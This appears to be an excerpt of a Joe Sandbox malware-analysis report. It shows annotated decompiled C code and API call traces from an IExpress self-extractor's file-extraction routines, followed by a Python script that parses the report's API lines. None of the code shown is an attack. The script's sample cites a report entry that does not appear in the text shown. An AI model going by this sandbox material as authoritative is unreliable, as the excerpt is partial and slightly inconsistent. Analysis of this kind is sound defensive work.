                                                                                                                                                                                                    • Opcode ID: 7bd2ae274a8f9cd69870f68f2e600b9d4c16034fd4a34e8ee4fcb32a0a404937
                                                                                                                                                                                                    • Instruction ID: ba2cf641b1c6554f9b952be9493f5bbba40dcb44230dd5438bf7306efd6b56dc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bd2ae274a8f9cd69870f68f2e600b9d4c16034fd4a34e8ee4fcb32a0a404937
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7821D231900614DFDB34AB20EC49BA977B5BF14B90F440259F886539A0CFF09DC8DB80
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00131FE1(void* __ecx) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				if( *0x138530 != 0) {
                                                                                                                                                                                                    					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                    					if(_t4 == 0) {
                                                                                                                                                                                                    						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
                                                                                                                                                                                                    						return RegCloseKey(_v8);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t4;
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0013538C,?,?,0013538C), ref: 00132005
                                                                                                                                                                                                    • RegDeleteValueA.KERNELBASE(0013538C,wextract_cleanup2,?,?,0013538C), ref: 00132017
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(0013538C,?,?,0013538C), ref: 00132020
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                    • API String ID: 849931509-3354236729
                                                                                                                                                                                                    • Opcode ID: e724f086ef428369c2ee4014e42229a5aa92f30e4d19f692cdc3f7b893ce3865
                                                                                                                                                                                                    • Instruction ID: ab2e1473d14fdae926eb6b0052391ab5dcf7b62c309d601719e24ebc39ff9125
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e724f086ef428369c2ee4014e42229a5aa92f30e4d19f692cdc3f7b893ce3865
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9E08631550318BBD7299F90ED4AF5D7B29FB01740F500194F944A04A0EBB15E94D605
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E00134CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				long _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    				long _t35;
                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                    				struct HWND__* _t37;
                                                                                                                                                                                                    				long _t38;
                                                                                                                                                                                                    				long _t39;
                                                                                                                                                                                                    				long _t41;
                                                                                                                                                                                                    				long _t44;
long _t45;
long _t46;
signed int _t50;
long _t51;
char* _t58;
long _t59;
char* _t63;
long _t64;
CHAR* _t71;
CHAR* _t74;
int _t75;
signed int _t76;

_t69 = __edx;
_t29 =  *0x138004; // 0xe764604f
_t30 = _t29 ^ _t76;
_v8 = _t30;
_t75 = _a8;
if( *0x1391d8 == 0) {
	_t32 = _a4;
	__eflags = _t32;
	if(_t32 == 0) {
		_t33 = E00134E99(_t75);
		L35:
		return E00136CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
	}
	_t35 = _t32 - 1;
	__eflags = _t35;
	if(_t35 == 0) {
		L9:
		_t33 = 0;
		goto L35;
	}
	_t36 = _t35 - 1;
	__eflags = _t36;
	if(_t36 == 0) {
		_t37 =  *0x138584; // 0x0
		__eflags = _t37;
		if(_t37 != 0) {
			SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
		}
		_t54 = 0x1391e4;
		_t58 = 0x1391e4;
		do {
			_t38 =  *_t58;
			_t58 =  &(_t58[1]);
			__eflags = _t38;
		} while (_t38 != 0);
		_t59 = _t58 - 0x1391e5;
		__eflags = _t59;
		_t71 =  *(_t75 + 4);
		_t73 =  &(_t71[1]);
		do {
			_t39 =  *_t71;
			_t71 =  &(_t71[1]);
			__eflags = _t39;
		} while (_t39 != 0);
		_t69 = _t71 - _t73;
		_t30 = _t59 + 1 + _t71 - _t73;
		__eflags = _t30 - 0x104;
		if(_t30 >= 0x104) {
			L3:
			_t33 = _t30 | 0xffffffff;
			goto L35;
		}
		_t69 = 0x1391e4;
		_t30 = E00134702( &_v268, 0x1391e4,  *(_t75 + 4));
		__eflags = _t30;
		if(__eflags == 0) {
			goto L3;
		}
		_t41 = E0013476D( &_v268, __eflags);
		__eflags = _t41;
		if(_t41 == 0) {
			goto L9;
		}
		_push(0x180);
		_t30 = E00134980( &_v268, 0x8302); // executed
		_t75 = _t30;
		__eflags = _t75 - 0xffffffff;
		if(_t75 == 0xffffffff) {
			goto L3;
		}
		_t30 = E001347E0( &_v268);
		__eflags = _t30;
		if(_t30 == 0) {
			goto L3;
		}
		 *0x1393f4 =  *0x1393f4 + 1;
		_t33 = _t75;
		goto L35;
	}
	_t44 = _t36 - 1;
	__eflags = _t44;
	if(_t44 == 0) {
		_t54 = 0x1391e4;
		_t63 = 0x1391e4;
		do {
			_t45 =  *_t63;
			_t63 =  &(_t63[1]);
			__eflags = _t45;
		} while (_t45 != 0);
		_t74 =  *(_t75 + 4);
		_t64 = _t63 - 0x1391e5;
		__eflags = _t64;
		_t69 =  &(_t74[1]);
		do {
			_t46 =  *_t74;
			_t74 =  &(_t74[1]);
			__eflags = _t46;
		} while (_t46 != 0);
		_t73 = _t74 - _t69;
		_t30 = _t64 + 1 + _t74 - _t69;
		__eflags = _t30 - 0x104;
		if(_t30 >= 0x104) {
			goto L3;
		}
		_t69 = 0x1391e4;
		_t30 = E00134702( &_v268, 0x1391e4,  *(_t75 + 4));
		__eflags = _t30;
		if(_t30 == 0) {
			goto L3;
		}
		_t69 =  *((intOrPtr*)(_t75 + 0x18));
		_t30 = E00134C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
		__eflags = _t30;
		if(_t30 == 0) {
			goto L3;
		}
		E00134B60( *((intOrPtr*)(_t75 + 0x14))); // executed
		_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
		__eflags = _t50;
		if(_t50 != 0) {
			_t51 = _t50 & 0x00000027;
			__eflags = _t51;
		} else {
			_t51 = 0x80;
		}
		_t30 = SetFileAttributesA( &_v268, _t51); // executed
		__eflags = _t30;
		if(_t30 == 0) {
			goto L3;
		} else {
			_t33 = 1;
			goto L35;
		}
	}
	_t30 = _t44 - 1;
	__eflags = _t30;
	if(_t30 == 0) {
		goto L3;
	}
	goto L9;
}
if(_a4 == 3) {
	_t30 = E00134B60( *((intOrPtr*)(_t75 + 0x14)));
}
goto L3;
Instruction listing for the function at 0x00134cd0 through 0x00134e98 (addresses only; the disassembly text for each instruction was not preserved in this copy of the report).

APIs
• SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00134DB5
• SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00134DDD
Strings
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: AttributesFileItemText
• String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
• API String ID: 3625706803-3290032183
• Opcode ID: f7af83895a3595aba1e69ed4ae22249fa3eb4cc2ab76231a81193432a79c7e2c
• Instruction ID: 73c0b32679cc59d194e510ce0710a67a779bfe81ac151e47062bcb8335277184
• Opcode Fuzzy Hash: f7af83895a3595aba1e69ed4ae22249fa3eb4cc2ab76231a81193432a79c7e2c
• Instruction Fuzzy Hash: 2C4155362002018BCF259FB8DD446F5B7A5FF65350F044668E886A7A95DF31FE8AC750
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00134C37(signed int __ecx, int __edx, int _a4) {
	struct _FILETIME _v12;
	struct _FILETIME _v20;
	FILETIME* _t14;
	int _t15;
	signed int _t21;

	_t21 = __ecx * 0x18;
	if(*((intOrPtr*)(_t21 + 0x138d64)) == 1 || DosDateTimeToFileTime(__edx, _a4, &_v20) == 0 || LocalFileTimeToFileTime(&_v20, &_v12) == 0) {
		L5:
		return 0;
	} else {
		_t14 = &_v12;
		_t15 = SetFileTime(*(_t21 + 0x138d74), _t14, _t14, _t14); // executed
		if(_t15 == 0) {
			goto L5;
		}
		return 1;
	}
}

APIs
• DosDateTimeToFileTime.KERNEL32 ref: 00134C54
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00134C66
• SetFileTime.KERNELBASE(?,?,?,?), ref: 00134C7E
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: Time$File$DateLocal
• String ID:
• API String ID: 2071732420-0
• Opcode ID: 68db87ac228759b8651cbaef6cad4b447bd20e1f4b7841e959a9dde544a183e9
• Instruction ID: 5aaa20cd6aa0f96dfc049033b9e7d7d6b8a219bf18a97e87b2e92a68f04e1c46
• Opcode Fuzzy Hash: 68db87ac228759b8651cbaef6cad4b447bd20e1f4b7841e959a9dde544a183e9
• Instruction Fuzzy Hash: 41F0907260120CAFEB24DFB4CC48DBB7BECEB14260B84052AB855C1050EB30E954D7A0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
E0013487A(CHAR* __ecx, signed int __edx) {
	void* _t7;
	CHAR* _t11;
	long _t18;
	long _t23;

	_t11 = __ecx;
	asm("sbb edi, edi");
	_t18 = (~(__edx & 3) & 0xc0000000) + 0x80000000;
	if((__edx & 0x00000100) == 0) {
		asm("sbb esi, esi");
		_t23 = (~(__edx & 0x00000200) & 0x00000002) + 3;
	} else {
		if((__edx & 0x00000400) == 0) {
			asm("sbb esi, esi");
			_t23 = (~(__edx & 0x00000200) & 0xfffffffe) + 4;
		} else {
			_t23 = 1;
		}
	}
	_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
	if(_t7 != 0xffffffff || _t23 == 3) {
		return _t7;
	} else {
		E0013490C(_t11);
		return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
	}
}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00134A23,?,00134F67,*MEMCAB,00008000,00000180), ref: 001348DE
                                                                                                                                                                                                    • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00134F67,*MEMCAB,00008000,00000180), ref: 00134902
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 3c224593de0ccbfaafaa7e821d9d2c06bfca126765a69c83de86fafefc173faa
• Instruction ID: f415741622b3d7e4ef0fb0e8bedab00c70636ffed6459ed1808be81256046354
• Opcode Fuzzy Hash: 3c224593de0ccbfaafaa7e821d9d2c06bfca126765a69c83de86fafefc173faa
• Instruction Fuzzy Hash: A20169A3E125702BF32480698C88FB7551CCBDA734F1B0374BDEAE72D2D6646C0482E0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
E00134AD0(signed int _a4, void* _a8, long _a12) {
	signed int _t9;
	int _t12;
	signed int _t14;
	signed int _t15;
	void* _t20;
	struct HWND__* _t21;
	signed int _t24;
	signed int _t25;

	_t20 =  *0x13858c; // 0x28c
	_t9 = E00133680(_t20); // pumps pending window messages (see subcall APIs below)
	if( *0x1391d8 == 0) { // global abort/cancel flag not set
		_push(_t24);
		// _a4 indexes a table of 0x18-byte entries at 0x138d74; the first field is the output file handle
		_t12 = WriteFile( *(0x138d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
		if(_t12 != 0) {
			_t25 = _a12; // bytes actually written
			if(_t25 != 0xffffffff) {
				_t14 =  *0x139400; // 0x9f200, running total of bytes written so far
				_t15 = _t14 + _t25;
				 *0x139400 = _t15;
				if( *0x138184 != 0) { // progress reporting enabled
					_t21 =  *0x138584; // 0x0, progress dialog window handle
					if(_t21 != 0) {
						// 0x402 == PBM_SETPOS: set progress bar 0x83a to written/total in percent
						SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x1393f8, 0);
					}
				}
			}
		} else {
			_t25 = _t24 | 0xffffffff; // WriteFile failed: return -1
		}
		return _t25;
	} else {
		return _t9 | 0xffffffff; // cancelled: return -1 without writing
	}
}

0x00134ad5
0x00134adb
0x00134ae7
0x00134aee
0x00134b05
0x00134b0d
0x00134b14
0x00134b1a
0x00134b1c
0x00134b21
0x00134b2a
0x00134b2f
0x00134b31
0x00134b39
0x00134b54
0x00134b54
0x00134b39
0x00134b2f
0x00134b0f
0x00134b0f
0x00134b0f
0x00134b5e
0x00134ae9
0x00134aed
0x00134aed

APIs
  • Part of subcall function 00133680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0013369F
  • Part of subcall function 00133680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001336B2
  • Part of subcall function 00133680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001336DA
• WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00134B05
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: MessagePeek$FileMultipleObjectsWaitWrite
• String ID:
• API String ID: 1084409-0
• Opcode ID: 19b5f0a2806acc7e4a20fe67b68e0fc51cb710e5a2465066dfc9018ce2ff3da7
• Instruction ID: 28fefc4a7a1f492c5dfd56aee7083adfc9854728422d1a4db3159214179857fb
• Opcode Fuzzy Hash: 19b5f0a2806acc7e4a20fe67b68e0fc51cb710e5a2465066dfc9018ce2ff3da7
• Instruction Fuzzy Hash: 7001B131200301EBDB148F68DC05BA2BB59FB44725F148265F9399B5F0CBB0E991CB80
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0013658A(char* __ecx, void* __edx, char* _a4) {
	intOrPtr _t4;
	char* _t6;
	char* _t8;
	void* _t10;
	void* _t12;
	char* _t16;
	intOrPtr* _t17;
	void* _t18;
	char* _t19;

	_t16 = __ecx; // destination path buffer
	_t10 = __edx; // size of the destination buffer
	_t17 = __ecx;
	_t1 = _t17 + 1; // 0x138b3f
	_t12 = _t1;
	do { // inline strlen over the destination buffer
		_t4 =  *_t17;
		_t17 = _t17 + 1;
	} while (_t4 != 0);
	_t18 = _t17 - _t12; // current string length
	_t2 = _t18 + 1; // 0x138b40
	if(_t2 < __edx) { // only continue if there is room for at least one more character
		_t19 = _t18 + __ecx; // pointer to the terminating NUL
		if(_t19 > __ecx) {
			_t8 = CharPrevA(__ecx, _t19); // executed
			if( *_t8 != 0x5c) { // 0x5c == '\\': append a path separator if the last character is not one
				 *_t19 = 0x5c;
				_t19 =  &(_t19[1]);
			}
		}
		_t6 = _a4;
		 *_t19 = 0;
		while( *_t6 == 0x20) { // 0x20 == ' ': skip leading spaces of the component to append
			_t6 = _t6 + 1;
		}
		return E001316B3(_t16, _t10, _t6); // append the component into the buffer
	}
	return 0x8007007a; // HRESULT for ERROR_INSUFFICIENT_BUFFER (0x7a)
}

0x00136592
0x00136594
0x00136596
0x00136598
0x00136598
0x0013659b
0x0013659b
0x0013659d
0x0013659e
0x001365a2
0x001365a4
0x001365a9
0x001365b2
0x001365b6
0x001365ba
0x001365c3
0x001365c5
0x001365c8
0x001365c8
0x001365c3
0x001365c9
0x001365cc
                                                                                                                                                                                                    0x001365d2
                                                                                                                                                                                                    0x001365d1
                                                                                                                                                                                                    0x001365d1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001365dc
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharPrevA.USER32(00138B3E,00138B3F,00000001,00138B3E,-00000003,?,001360EC,00131140,?), ref: 001365BA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CharPrev
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 122130370-0
                                                                                                                                                                                                    • Opcode ID: d4936ca91fd7448949a5e837e6bbc0c135e3071f78a07ee1394534659a178ca1
                                                                                                                                                                                                    • Instruction ID: ef4c409ca5762be5983c336f5ebe47eebcf3d7cf723880da754b6c345d882051
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4936ca91fd7448949a5e837e6bbc0c135e3071f78a07ee1394534659a178ca1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DF042321042507BD735051D9884B76BFDD9BD6390F15817EE8DEC3209CB554C4683A4
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                     			E0013621E() {
                                                                                                                                                                                                     				signed int _v8;      // stack-cookie slot at [ebp-4]
                                                                                                                                                                                                     				char _v268;          // 260-byte path buffer (0x104 == MAX_PATH)
                                                                                                                                                                                                     				signed int _t5;
                                                                                                                                                                                                     				void* _t9;
                                                                                                                                                                                                     				void* _t13;
                                                                                                                                                                                                     				void* _t19;
                                                                                                                                                                                                     				void* _t20;
                                                                                                                                                                                                     				signed int _t21;     // frame pointer; XORed into the cookie
                                                                                                                                                                                                     
                                                                                                                                                                                                     				_t5 =  *0x138004; // 0xe764604f  -- global cookie; "cookie ^ ebp -> [ebp-4]" is the MSVC /GS prologue
                                                                                                                                                                                                     				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                     				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                     					// success: the Windows directory path is handed to E0013597D
                                                                                                                                                                                                     					0x4f0 = 2; // decompiler artifact (a store to an immediate); the instruction loads the constant 2 into a register/argument slot
                                                                                                                                                                                                     					_t9 = E0013597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                     				} else {
                                                                                                                                                                                                     					// failure: E001344B9 loads string 0x4B1 and shows it via MessageBoxA (uType 0x10010 = MB_ICONHAND | MB_SETFOREGROUND, see APIs below);
                                                                                                                                                                                                     					// _t8 is a register value the decompiler did not recover
                                                                                                                                                                                                     					E001344B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                     					 *0x139124 = E00136285(); // E00136285 is a thin wrapper around GetLastError (its ref address is the function start); the Win32 error code is kept in a global
                                                                                                                                                                                                     					_t9 = 0;
                                                                                                                                                                                                     				}
                                                                                                                                                                                                     				return E00136CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20); // epilogue: _v8 ^ _t21 must equal the saved cookie (stack-cookie check), _t9 is the result
                                                                                                                                                                                                     			}

                                                                                                                                                                                                     Instruction addresses for the decompiled lines above, in listing order: 0x00136229, 0x00136230, 0x00136247, 0x0013626a, 0x00136272, 0x00136249, 0x00136255, 0x0013625f, 0x00136264, 0x00136264, 0x00136284

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0013623F
                                                                                                                                                                                                      • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
                                                                                                                                                                                                      • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
                                                                                                                                                                                                      • Part of subcall function 00136285: GetLastError.KERNEL32(00135BBC), ref: 00136285
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 381621628-0
                                                                                                                                                                                                    • Opcode ID: 5971cdbee6760512ac0fe5c3cd8d3491d434e6d996b6ac597433bb341e1caa57
                                                                                                                                                                                                    • Instruction ID: f75f58d70087241f7e1fbb64422600158c7c4c965eb2ecaacb086002afdcf978
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5971cdbee6760512ac0fe5c3cd8d3491d434e6d996b6ac597433bb341e1caa57
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04F082B0704208BBE754EB749D06FBF77ACDB64700F41446AB9CAD6192EFB49D848750
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%
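The "APIs" bullets in this report follow one fixed shape: an optional "Part of subcall function XXXX:" prefix, then `Api.MODULE(arg,arg,...), ref: ADDR`, with `?` for arguments the sandbox could not resolve. Because a report of this size lists thousands of such lines, it pays to parse them rather than read them. The following Python is an added example, not Joe Sandbox code and not part of this report: it parses the bullets into records, separates a function's own calls from those inherited from subcalls, and decodes the MessageBoxA `uType` value seen above (0x10010) into its named flags. The sample text is constructed from the two entries on this page; the regular expression and the flag tables are ours.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: two "APIs" sections in the shape this report prints
# them. The first is the E0013621E entry above; the second is the E00134B60 entry.
SAMPLE_REPORT = """\
APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0013623F
  • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
  • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
  • Part of subcall function 00136285: GetLastError.KERNEL32(00135BBC), ref: 00136285
Memory Dump Source
APIs
• FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00134FA1,00000000), ref: 00134B98
Memory Dump Source
"""

# One bullet line: optional "Part of subcall function XXXX:" prefix, then
# Api.MODULE(arg,arg,...), ref: ADDR
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[str]]   # None where the report prints '?' (unresolved)
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # set when the call is attributed to a callee


def parse_api_sections(text: str) -> List[List[ApiCall]]:
    """Return one list of ApiCall per 'APIs' block, in report order."""
    sections: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            sections.append(current)
            continue
        m = API_LINE.match(line)
        if m is None or current is None:
            continue          # other report lines carry no API record; skip them
        raw_args = m["args"].split(",") if m["args"] else []
        current.append(ApiCall(
            api=m["api"],
            module=m["mod"],
            args=[None if a.strip() == "?" else a.strip() for a in raw_args],
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None,
        ))
    return sections


def direct_calls(calls: List[ApiCall]) -> List[str]:
    """APIs the function calls itself, excluding those inherited from subcalls."""
    return [c.api for c in calls if c.subcall_of is None]


def calls_by_subcall(calls: List[ApiCall]) -> Dict[int, List[str]]:
    """Map each subcall address to the APIs the report attributes to it."""
    out: Dict[int, List[str]] = {}
    for c in calls:
        if c.subcall_of is not None:
            out.setdefault(c.subcall_of, []).append(c.api)
    return out


# MessageBoxA uType decoding: buttons and icon are 4-bit fields (so 0x30 is not
# 0x10 | 0x20 but its own value); the remaining constants are single bits.
MB_BUTTONS = {0: "MB_OK", 1: "MB_OKCANCEL", 2: "MB_ABORTRETRYIGNORE",
              3: "MB_YESNOCANCEL", 4: "MB_YESNO", 5: "MB_RETRYCANCEL"}
MB_ICONS = {0x10: "MB_ICONHAND", 0x20: "MB_ICONQUESTION",
            0x30: "MB_ICONEXCLAMATION", 0x40: "MB_ICONASTERISK"}
MB_BITS = {0x1000: "MB_SYSTEMMODAL", 0x2000: "MB_TASKMODAL",
           0x10000: "MB_SETFOREGROUND", 0x40000: "MB_TOPMOST"}


def decode_mb_flags(utype: int) -> List[str]:
    names = [MB_BUTTONS.get(utype & 0xF, f"buttons=0x{utype & 0xF:x}")]
    if utype & 0xF0:
        names.append(MB_ICONS.get(utype & 0xF0, f"icon=0x{utype & 0xF0:x}"))
    names += [name for bit, name in sorted(MB_BITS.items()) if utype & bit]
    return names


if __name__ == "__main__":
    for calls in parse_api_sections(SAMPLE_REPORT):
        print("direct:", direct_calls(calls), "via subcalls:", calls_by_subcall(calls))
        for c in calls:
            if c.api == "MessageBoxA" and c.args[3]:
                print("MessageBoxA flags:", decode_mb_flags(int(c.args[3], 16)))
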